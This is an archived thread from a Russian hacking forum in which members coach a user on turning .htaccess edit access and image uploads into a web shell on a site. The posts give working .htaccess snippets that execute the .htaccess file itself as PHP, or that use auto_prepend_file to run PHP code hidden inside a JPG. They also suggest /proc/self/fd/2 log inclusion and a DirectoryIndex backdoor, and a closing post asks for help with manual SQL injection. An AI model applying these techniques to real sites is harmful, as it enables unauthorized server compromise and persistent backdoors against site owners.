ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.05.2013, 19:53
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203
Репутация:
704
|
|
Сообщение от qaz
qaz said:
я кроме как редачиь htaccess и заливать картинки ничего не могу
тогда копай в сторону кривого кода аплоадера картинок
иначе никак
|
|
|
23.05.2013, 21:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Сообщение от qaz
qaz said:
есть еозможность чеерез админку редактировать htaccess, можно ли ккак-то алить шелл через него?
Да, разрешаешь в нем чтение .htaccess всем (или только себе),
указываешь выполнять .htaccess как php скрипт,
и тут же пишешь код.
Сначала поэкспериментируй на локалхост.
Код приводить не буду.
|
|
|
|
23.05.2013, 22:34
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от nikp
nikp said:
Да, разрешаешь в нем чтение .htaccess всем (или только себе),
указываешь выполнять .htaccess как php скрипт,
и тут же пишешь код.
Сначала поэкспериментируй на локалхост.
Код приводить не буду.
Проще залить шелл в формате изображения и потом через вышеуказанный .htaccess посредством директивы append(prepend) выполнить. К тому-же, выполнить в теле htaccess явно - не получится, синтаксис htaccess жестко формален и при помещении php кода внуть вызывает 500 ошибку
|
|
|
|
23.05.2013, 23:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от nikp
nikp said:
Да, разрешаешь в нем чтение .htaccess всем (или только себе),
указываешь выполнять .htaccess как php скрипт,
и тут же пишешь код.
Сначала поэкспериментируй на локалхост.
Код приводить не буду.
такс, поексперементировал,
PHP код:
PHP:
[COLOR="#000000"]
Allow from 100.247.115.100
AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess
# [COLOR="#0000BB"][/COLOR][/COLOR]
файл htaccess начинает скачиватся при открытии, как это исправиь знаний не хватает и гугль не помог
Сообщение от Cennarios
Cennarios said:
Проще залить шелл в формате изображения и потом через вышеуказанный .htaccess посредством директивы append(prepend) выполнить. К тому-же, выполнить в теле htaccess явно - не получится, синтаксис htaccess жестко формален и при помещении php кода внуть вызывает 500 ошибку
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]Allow from 100.247.115.100
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]php_value auto_prepend_file[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]home[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]domains[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]h[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]public_html[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]phps[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]jpg[/COLOR][/COLOR]
а как мне его заставить выполнить код который в картинке?
|
|
|
|
23.05.2013, 23:31
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от qaz
qaz said:
такс, поексперементировал,
PHP код:
PHP:
[COLOR="#000000"]
Allow from 100.247.115.100
AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess
# [COLOR="#0000BB"][/COLOR][/COLOR]
файл htaccess начинает скачиватся при открытии, как это исправиь знаний не хватает и гугль не помог
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]Allow from 100.247.115.100
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]php_value auto_prepend_file[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]home[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]domains[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]h[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]public_html[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]phps[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]jpg[/COLOR][/COLOR]
а как мне его заставить выполнить код который в картинке? php_value или php_admin_value
auto_prepend_file или auto_append_file
Путь к картинке содержащей обрамленный php-тегами код: /home/domains/h.ru/public_html/phps.jpg
Если в самом конфиге апача вышеуказанные директивы уже описаны, то переопределяться в .htaccess файлах не будут.
P.S. Как итересная альтернатива коду в картинке можно попробовать приатачить лог перебором пути - /proc/self/fd/2 etc...
|
|
|
|
24.05.2013, 13:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Сообщение от qaz
qaz said:
такс, поексперементировал,
файл htaccess начинает скачиватся при открытии, как это исправиь знаний не хватает и гугль не помог
а как мне его заставить выполнить код который в картинке?
Молодец, оба варианта правильные.
Если на сервере команды не выполняются, значит нарушены условия http://php.net/manual/ru/configuration.changes.php
Т.е. нужно, чтобы php запускался, как модуль Апача и разрешены AllowOverride All или AllowOverride Options.
|
|
|
|
24.05.2013, 14:01
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Allow from 100.247.115.100
AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess
#
Этот вариант неправильный. Вот тут - # решетка - знак комментария, чему тут выполняться то? Уберешь решетку - получишь 500 ошибку на синтаксисе htaccess файла
|
|
|
|
24.05.2013, 14:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Сообщение от Cennarios
Cennarios said:
Allow from 100.247.115.100
AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess
#
Этот вариант неправильный. Вот тут - # решетка - знак комментария, чему тут выполняться то? Уберешь решетку - получишь 500 ошибку на синтаксисе htaccess файла
Правильный, ты не понял фишку этого комментария
Пробуй
PHP код:
PHP:
[COLOR="#000000"]
allow from all
AddType application/x-httpd-php .htaccess
#[COLOR="#0000BB"]
[/COLOR][/COLOR]
|
|
|
|
24.05.2013, 14:17
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Где-то есть зависимость от базовых правил httpd.conf, так как на одном сервере заработало а на другом нет.
P.S.
натолкнуло на интересную мысль: Добавив DirectoryIndex .htaccess можно через теже non-GPC принимать данные на выполнение команд или кода в ракурсе бэкдора на сайте.
P.S.
Причем если php engine OFF или noexec то будет отдано как plain.
Тогда вариант - shtml если настроено на сервере(предположение)
|
|
|
|
24.05.2013, 14:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
9074
Репутация:
81
|
|
Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
